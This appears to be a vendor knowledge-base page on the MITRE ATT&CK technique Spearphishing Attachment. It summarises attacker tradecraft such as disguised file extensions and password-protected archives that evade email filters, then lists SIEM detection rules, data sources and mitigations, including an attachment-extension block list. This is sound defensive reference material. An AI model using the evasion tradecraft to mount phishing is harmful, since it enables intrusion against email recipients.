T1566.001: Spearphishing Attachment
Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
Positive Technologies products that cover the technique
MaxPatrol SIEM knowledge base
mitre_attck_execution: PT-CR-345: Malicious_Office_Document: A suspicious sequence of process startup by a Microsoft Office application is detected
mitre_attck_execution: PT-CR-605: Office_File_with_Macros: A user opened a Microsoft Office document with a macro
mitre_attck_execution: PT-CR-648: Suspicious_Child_from_Messenger_Process: A user started a process from a parent messenger process
vulnerabilities: PT-CR-1375: Windows_Contacts_RCE: Possible exploitation of vulnerability CVE-2022-44666 in Windows Contacts
vulnerabilities: PT-CR-779: MSDT_CVE_2022_30190: The ms-msdt protocol was used to exploit vulnerability CVE-2022-30190 (Follina) in Microsoft Support Diagnostic Tool (MSDT)
vulnerabilities: PT-CR-892: Possible_CVE_2021_1647: Possible exploitation of vulnerability CVE-2021-1647 in Windows Defender
antimalware: PT-CR-722: Sandbox_Full_Scan_Malware: PT Sandbox is triggered by an analysis session result
antimalware: PT-CR-723: Subrule_Sandbox_File_Verdict: PT Sandbox is triggered by a file during an analysis session
antimalware: PT-CR-726: Sandbox_Spam_Attack_By_Attachment: Spam delivery with the same attachment is detected
antimalware: PT-CR-727: Sandbox_Spam_Attack_By_Source: Spam delivery from the same sender is detected
antimalware: PT-CR-728: Sandbox_Spam_Attack_By_Title: Spam delivery with the same subject is detected
antimalware: PT-CR-729: Subrule_Sandbox_Mail_Attachment: A PT Sandbox event is supplemented with attachment information
antimalware: PT-CR-745: Subrule_Sandbox_Mail_IP: A PT Sandbox event is supplemented with IP address information
process_chains_and_logons: PT-CR-950: Suspicious_Office_Process_Chain: Suspicious process start chain for Microsoft Office or Adobe Acrobat applications
mitre_attck_initial_access: PT-CR-2301: Suspicious_File_Creation_From_Messenger_or_Mail: A file with a suspicious extension was created on behalf of an instant messenger or email program, or malicious file activity was detected. This may indicate a phishing attack or malware being delivered to user's computer.
mitre_attck_initial_access: PT-CR-2416: Open_Password_Protected_File: A user opened an encrypted ZIP archive using a native OS tool and launched a file
mitre_attck_initial_access: PT-CR-2447: WMI_Execution_via_VBA_Macro: A process was created using a Windows Management Instrumentation command from a Microsoft Office document macro
process_chains_and_logons: PT-CR-1213: Suspicious_Messenger_Process_Chain: Suspicious process start chain for instant messenger programs
antimalware: PT-CR-1770: Subrule_Sandbox_Count_Mail_Attachments: A PT Sandbox event is supplemented with attachment count information
antimalware: PT-CR-2080: KSMG_Malware_Detect_And_Clean: A malicious object is found in an email and cured
antimalware: PT-CR-2084: KSMG_Encrypted_Message_Detected: An encrypted file object is found in an email
antimalware: PT-CR-2085: KSMG_Malware_remove: A malicious object is found and deleted from an email
Detection
| ID | DS0029 | Data source and component | Network Traffic: Network Traffic Content | Description | Monitor and analyze SSL/TLS traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. |
|---|
| ID | DS0015 | Data source and component | Application Log: Application Log Content | Description | Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Monitor for suspicious descendant process spawning from Microsoft Office and other productivity software. |
|---|
| ID | DS0029 | Data source and component | Network Traffic: Network Traffic Flow | Description | Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. |
|---|
| ID | DS0022 | Data source and component | File: File Creation | Description | Monitor for newly constructed files from a spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. |
|---|
Mitigation
| ID | M1049 | Name | Antivirus/Antimalware | Description | Anti-virus can also automatically quarantine suspicious files. |
|---|
| ID | M1031 | Name | Network Intrusion Prevention | Description | Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity. |
|---|
| ID | M1054 | Name | Software Configuration | Description | Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation. |
|---|
| ID | M1017 | Name | User Training | Description | Users can be trained to identify social engineering techniques and spearphishing emails. |
|---|
| ID | M1021 | Name | Restrict Web-Based Content | Description | Block unknown or unused attachments by default that should not be transmitted over email as a best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc. Some email scanning devices can open and analyze compressed and encrypted formats, such as zip and rar that may be used to conceal malicious attachments. |
|---|